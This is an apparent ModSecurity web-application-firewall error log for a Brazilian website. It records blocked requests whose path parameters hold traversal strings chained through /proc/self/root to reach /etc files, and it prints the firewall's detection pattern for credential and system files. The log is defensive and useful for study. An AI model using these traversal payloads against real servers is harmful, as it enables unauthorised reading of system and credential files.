https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:34.892811 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:46934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07Gbninkcc-iUj5AptoAAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:18:35.111589 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.243.128:46934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07G7ninkcc-iUj5AptogAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:18:37.299936 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.243.128:46946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07HPXLqtnMIWvjpaKpxAAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:38.699296 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:46950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07HhCii7xarUs8iHZ2_AAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:42.719476 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:48190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07IjJ3M9BSuKP7CAYuWgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:43.684983 2026] [:error] [pid 11167:tid 140411649607424] [client 216.73.216.191:53184] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07I_HIg5MgXLBnicMGkwAAAcs"]
[Fri Mar 20 09:18:45.164496 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:48200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07JV1pVZ5mVmJwsFNBHAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:45.302563 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.228.61:49772] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab07Jda6ubjKNq_cu4bmZQAAA0s"]
[Fri Mar 20 09:18:45.988978 2026] [:error] [pid 31215:tid 140411565680384] [client 216.73.216.191:53342] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07JQF0L0L-SsrnPo54EwAAAtU"]
[Fri Mar 20 09:18:46.492372 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.243.128:48210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07Jl1pVZ5mVmJwsFNBIQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:47.827004 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:48222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07J-oXxyEfFpUF8f-P2wAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:50.196086 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.243.128:48224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07KfHIg5MgXLBnicMGmgAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:50.199174 2026] [:error] [pid 26799:tid 140411725141760] [client 216.73.216.191:53568] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07Kda6ubjKNq_cu4bmZgAAA0I"]
[Fri Mar 20 09:18:50.258499 2026] [:error] [pid 10189:tid 140411616036608] [client 216.73.216.191:53556] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/utc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07KTJ3M9BSuKP7CAYuXwAAAI8"]
[Fri Mar 20 09:18:51.672374 2026] [:error] [pid 11642:tid 140411683178240] [client 216.73.216.191:53686] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07K7ninkcc-iUj5AptuwAAA4c"]
[Fri Mar 20 09:18:51.703102 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.243.128:52478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07K_HIg5MgXLBnicMGnAAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:51.771052 2026] [:error] [pid 10189:tid 140411683178240] [client 216.73.216.191:53700] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07KzJ3M9BSuKP7CAYuZgAAAIc"]
[Fri Mar 20 09:18:52.599488 2026] [:error] [pid 11167:tid 140411725141760] [client 216.73.216.191:53758] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07LPHIg5MgXLBnicMGngAAAcI"]
[Fri Mar 20 09:18:53.105117 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:52484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07LfqxLDW4GITHUkT5UwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:54.451724 2026] [:error] [pid 11642:tid 140411540502272] [client 216.73.216.191:53894] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07Lrninkcc-iUj5AptyAAAA5g"]
[Fri Mar 20 09:18:54.830953 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:52486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07LuoXxyEfFpUF8f-P4wAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:56.114908 2026] [:error] [pid 9818:tid 140411599251200] [client 216.73.216.191:54004] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07MF1pVZ5mVmJwsFNBIwAAAFE"]
[Fri Mar 20 09:18:56.359683 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:52500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07MF1pVZ5mVmJwsFNBJQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:18:56.707397 2026] [:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:54046] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07MOoXxyEfFpUF8f-P5gAAAUI"]
[Fri Mar 20 09:18:57.313387 2026] [:error] [pid 9818:tid 140411616036608] [client 216.73.216.191:54090] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab07MV1pVZ5mVmJwsFNBJwAAAE8"]
